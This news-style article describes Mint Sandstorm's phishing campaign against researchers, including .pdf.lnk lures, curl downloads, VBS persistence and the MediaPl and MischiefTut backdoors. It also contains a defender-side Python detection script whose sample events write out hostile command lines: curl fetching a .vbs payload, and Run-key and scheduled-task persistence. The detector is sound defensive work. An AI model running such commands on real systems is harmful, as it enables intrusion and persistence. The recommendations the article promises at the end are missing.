Hackers frequently target researchers to gain unauthorized access to valuable research data, intellectual property, and highly sensitive information.
Threat actors can exploit this information for various illicit purposes, such as economic espionage, competitive advantage, or selling the data on the black market.
Cybersecurity researchers at Microsoft recently discovered that the threat actors behind Mint Sandstorm are actively attacking researchers with new hacking tools.
Mint Sandstorm (PHOSPHORUS), which is linked to Iran’s IRGC, has been actively targeting high-profile individuals at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the US since November 2023, using custom phishing to deploy the MediaPl backdoor.
The operators of this threat group are highly skilled social engineers who adapt their tactics and persist in compromised environments, which makes them a serious threat.
Mint Sandstorm’s most recent campaign demonstrates new strategies such as phishing with hacked email accounts, using curl commands to connect to their server, and deploying the MediaPl backdoor.
They impersonate renowned figures, using individualized phishing lures and a benign initial email to build trust before delivering malicious content.
Using hacked but genuine email accounts strengthens Mint Sandstorm’s legitimacy, which is critical to the campaign’s success.
Targets who agreed to review documents in Mint Sandstorm’s campaign received follow-up emails with links to malicious domains like cloud-document-edit[.]onrender[.]com.
These domains hosted RAR archives which, when opened, decompressed into double-extension .pdf.lnk files that ran curl commands to retrieve malicious files from glitch[.]me and supabase[.]co.
Microsoft detected various files, including .vbs scripts and renamed copies of NirCmd, a legitimate command-line utility for performing actions without a user interface.
Mint Sandstorm used Persistence.vbs to maintain persistence, either by adding a .vbs file to a registry key or by creating a scheduled task to download a .txt file from supabase[.]co.
They logged device activity to files such as documentLogger.txt and dropped two custom backdoors, MediaPl and MischiefTut. MediaPl is disguised as Windows Media Player; it encrypts its communications and manipulates image files to carry C2 information.
Moreover, it can terminate itself, retry C2 communications, and execute commands. MischiefTut is a PowerShell-based backdoor that offers basic capabilities within this sophisticated campaign.
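As an added defender-side example (not from the article or from Microsoft's report), the following Python sketch flags the chain described above in constructed process-creation events: a double-extension .pdf.lnk lure, curl downloads from the reported domains or writing script files, and .vbs persistence through the Run key or a scheduled task. Only the domain names come from the article; every path, file name, URL and event field is constructed.

```python
import re
from urllib.parse import urlparse

# Domains named in the article's reporting; a real deployment would use an intel feed.
WATCHED_DOMAINS = ("glitch.me", "supabase.co", "onrender.com")
SCRIPT_EXTS = (".vbs", ".js", ".ps1", ".bat", ".cmd", ".exe", ".dll")

RE_DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.lnk\b", re.I)
RE_CURL_OUT = re.compile(r"\bcurl(?:\.exe)?\b.*?(?:-o|--output)\s+(\S+)", re.I)
RE_URL = re.compile(r"https?://[^\s\"']+", re.I)
RE_RUN_KEY = re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b.*\.vbs", re.I)
RE_SCHTASK = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b.*?(?:curl|\.vbs|\.txt)", re.I)

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\Invitation.pdf.lnk"'},
    {"parent": "cmd.exe", "image": "curl.exe",
     "cmdline": r"curl.exe -s https://example-app.glitch.me/p -o C:\Users\u\AppData\Local\Temp\Persistence.vbs"},
    {"parent": "wscript.exe", "image": "reg.exe",
     "cmdline": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Media /d "wscript C:\Users\u\AppData\Local\Temp\Persistence.vbs"'},
    {"parent": "wscript.exe", "image": "schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 30 /tn Upd /tr "curl https://x.supabase.co/f.txt -o %TEMP%\f.txt"'},
    {"parent": "explorer.exe", "image": "curl.exe",  # benign download, should not be flagged
     "cmdline": r"curl.exe https://intranet.example.org/report.pdf -o report.pdf"},
]

def host_is_watched(url):
    """True when the URL's host is one of the watched domains or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)

def classify(event):
    """Return the list of campaign-style behaviours seen in one event's command line."""
    cmd = event["cmdline"]
    tags = []
    if RE_DOUBLE_EXT.search(cmd):
        tags.append("double_extension_lnk")
    m = RE_CURL_OUT.search(cmd)
    if m:
        out_file = m.group(1).strip('"').lower()
        # Flag curl when it pulls from a watched domain or writes a script/binary to disk.
        if any(host_is_watched(u) for u in RE_URL.findall(cmd)) or out_file.endswith(SCRIPT_EXTS):
            tags.append("curl_download")
    if RE_RUN_KEY.search(cmd):
        tags.append("run_key_vbs_persistence")
    if RE_SCHTASK.search(cmd):
        tags.append("schtask_persistence")
    return tags

def hunt(events):
    """Return (index, tags) for every event that matched at least one behaviour."""
    results = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            results.append((i, tags))
    return results
```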
Mint Sandstorm’s remote access capability poses a threat to system confidentiality, risking legal and reputational consequences for targeted organizations.
Microsoft has enhanced its detections to help customers defend against this patient and skilled subgroup of Mint Sandstorm.
The recommendations provided by the security researchers are listed below:
By following and implementing the recommendations provided by the cybersecurity researchers at Microsoft, such threats can be mitigated effectively.